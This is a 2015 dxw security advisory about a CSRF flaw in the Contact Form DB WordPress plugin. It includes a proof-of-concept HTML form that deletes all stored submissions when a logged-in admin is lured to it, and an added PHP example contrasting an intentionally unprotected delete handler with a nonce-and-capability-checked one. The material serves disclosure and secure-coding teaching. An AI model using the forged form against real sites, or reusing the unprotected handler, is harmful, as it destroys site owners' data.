Reporter Tom Adams
Software: Contact Form DB
Advisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
CSRF in Contact Form DB allows attacker to delete all stored form submissions
An attacker able to convince a logged-in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.
Proof of concept
<form action="http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions" method="post">
  <input name="all" type="text" value="y">
  <input name="delete" type="text" value="y">
</form>
Upgrade to version 2.8.32 or later
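The advisory's root cause is an admin-page handler that deletes records on the strength of two POST fields alone. As an added example (not Contact Form DB's own code, and not a claim about what the 2.8.32 fix contains), the vulnerable pattern is shown beside the standard WordPress defence: a nonce bound to the action plus a capability check. The page slug and the `all`/`delete` field names come from the advisory; every function, constant and table name below is a hypothetical placeholder.

```php
<?php
// Added example (not Contact Form DB's own code): protecting an admin-page
// "delete all" handler, like the one in the advisory, against CSRF.
// Page slug and POST fields 'all'/'delete' come from the advisory; all
// function, constant and table names here are hypothetical placeholders.

// --- Vulnerable pattern: acts on POST data with no origin or intent check ---
function cfdb_example_handle_vulnerable() {
    if ( isset( $_POST['all'] ) && isset( $_POST['delete'] ) ) {
        // A forged cross-site POST carrying these two fields reaches this call.
        cfdb_example_delete_all_submissions();
    }
}

// --- Hardened pattern: nonce tied to the action + capability check ---------
const CFDB_EXAMPLE_ACTION = 'cfdb_example_delete_all';

function cfdb_example_render_delete_form() {
    $url = admin_url( 'admin.php?page=CF7DBPluginSubmissions' );
    echo '<form method="post" action="' . esc_url( $url ) . '">';
    // Emits _wpnonce (bound to this action and the current user/session)
    // plus _wp_http_referer; a page on another origin cannot obtain it.
    wp_nonce_field( CFDB_EXAMPLE_ACTION );
    echo '<input type="hidden" name="all" value="y">';
    echo '<input type="hidden" name="delete" value="y">';
    submit_button( 'Delete all submissions', 'delete' );
    echo '</form>';
}

function cfdb_example_handle_hardened() {
    if ( ! isset( $_POST['all'], $_POST['delete'] ) ) {
        return;
    }
    // Authorization: only users allowed to manage plugin data may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF defence: the nonce must be present and valid for this action.
    // check_admin_referer() calls wp_die() on failure, so a forged form
    // never reaches the delete call.
    check_admin_referer( CFDB_EXAMPLE_ACTION );
    cfdb_example_delete_all_submissions();
}

function cfdb_example_delete_all_submissions() {
    global $wpdb;
    // Placeholder table; the plugin's real storage layout is not described
    // in the advisory.
    $wpdb->query( 'DELETE FROM ' . $wpdb->prefix . 'cfdb_example_submissions' );
}
```

Note that a nonce check is an intent check, not an authorization check, which is why the capability test is kept alongside it.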
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
2015-02-17: Reported to vendor by email
2015-02-22: Vendor responded and agreed a schedule for fix
2015-02-23: Vendor published a fix in version 2.8.32
2015-03-04: Advisory published
Discovered by dxw.
Please visit security.dxw.com for more information.